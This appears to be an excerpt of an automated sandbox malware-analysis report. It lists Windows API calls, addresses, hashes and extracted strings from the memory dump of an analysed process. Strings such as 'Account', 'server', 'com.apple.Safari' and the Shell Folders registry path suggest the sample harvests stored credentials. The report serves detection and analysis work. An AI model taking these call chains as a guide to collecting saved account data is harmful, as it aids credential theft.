                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce2466471669987c666e67cbc57062670122e418a6cffd54e65e547fd76c7650
                                                                                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumNamesResource
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3334572018-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Open
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 71445658-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AttributesFile
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3188754299-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3655998216-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1828521557-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406942
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 609303285-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2081463915-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2136311172-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1936579350-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2565263379-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098B5
                                                                                                                                                                                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                          • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2014503067-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                                                                                                                                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,76FBDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                                                                                                                                          • String ID: OsError 0x%x (%u)
                                                                                                                                                                                          • API String ID: 403622227-2664311388
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1865533344-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NtdllProc_Window
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4255912815-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                                                                                          • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040269B
                                                                                                                                                                                            • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          • memcpy.MSVCRT ref: 004026FF
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                          • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                          • API String ID: 577499730-1134094380
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                          • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                          • API String ID: 2787044678-1921111777
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                          • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                          • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                          • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                          • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
